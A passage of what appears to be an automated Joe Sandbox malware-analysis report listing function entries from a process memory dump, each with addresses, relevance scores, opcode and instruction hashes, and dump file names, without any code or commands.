                                                            • API ID:
                                                            • String ID: hQ'$hQ'$-e1 $~l\4
                                                            • API String ID: 0-852282333
                                                            • Opcode ID: 571bbd7c39a8b38ba110117c65092abef623efe5a90347e4de7f927f8a525a7e
                                                            • Instruction ID: 9fed3916663ac2518c22fb3f9d8291290150f26337b02bc98816c06335558ce4
                                                            • Opcode Fuzzy Hash: 571bbd7c39a8b38ba110117c65092abef623efe5a90347e4de7f927f8a525a7e
                                                            • Instruction Fuzzy Hash: 2C22E836B0E6C286EE748F14A0D06BE6B90EF95750F100676DA8DC7B94CF2DF9848B41
                                                            Function 00007FF6A7952E50 Relevance: 4.6, Strings: 3, Instructions: 895COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GJa$GJa$GJa
                                                            • API String ID: 0-3642674650
                                                            • Opcode ID: 0c348fc288a93fa060477172dce58abe54c6a9a6db8301271ec97454f4dea61e
                                                            • Instruction ID: 6f2d83088aa850fb68c2058a1eb5496839268df100dfdbc2bc075cb37a02a239
                                                            • Opcode Fuzzy Hash: 0c348fc288a93fa060477172dce58abe54c6a9a6db8301271ec97454f4dea61e
                                                            • Instruction Fuzzy Hash: 82824D66A0E69387EA74CF18F44023E6395EB84795F204137EA5DDBBD6CE2CE44C8B05
                                                            Function 00007FF6A7933920 Relevance: .7, Instructions: 652COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9483b79cbef6030272edd2b483d888ba64738fff6a5e46b7d35480833c2653bb
                                                            • Instruction ID: e54ce3a627517944be0300fc560c1f34f7f5c201291fc098efec01dc72948d5b
                                                            • Opcode Fuzzy Hash: 9483b79cbef6030272edd2b483d888ba64738fff6a5e46b7d35480833c2653bb
                                                            • Instruction Fuzzy Hash: 7A421C2671E687C6EB748F2D948073EB695E785760F20913BE99EC7BD5CE2CD8404B01
                                                            Function 00007FF6A7929240 Relevance: .4, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c5a69f0bc0b3eb998eb1fb78d7a60b334de5a6656bacc05fe63e89f97114bc8
                                                            • Instruction ID: 34250e6a5aed7e23940a7a61b206e6c3ed8c700689ee67b696f112e0881c0861
                                                            • Opcode Fuzzy Hash: 1c5a69f0bc0b3eb998eb1fb78d7a60b334de5a6656bacc05fe63e89f97114bc8
                                                            • Instruction Fuzzy Hash: AFF1C532A0EA8786FA749F1DA04027E7394AB89771F344573E99DD7BA5CE2CE440C781
                                                            Function 00007FF6A78FA710 Relevance: .2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4bee06be94c71dbb2760361c1e64aa9c6309a91afbb7b004a4e9eae8e8dc17d
                                                            • Instruction ID: 505887f25d2c954305050dad692e2b10b75d144ed1861d8047f9e1ad06e97f88
                                                            • Opcode Fuzzy Hash: d4bee06be94c71dbb2760361c1e64aa9c6309a91afbb7b004a4e9eae8e8dc17d
                                                            • Instruction Fuzzy Hash: E5518E9BA34A6509A7204E7A5C8167BEC823780374F57AB35DE72A73D0E97DDC8142C1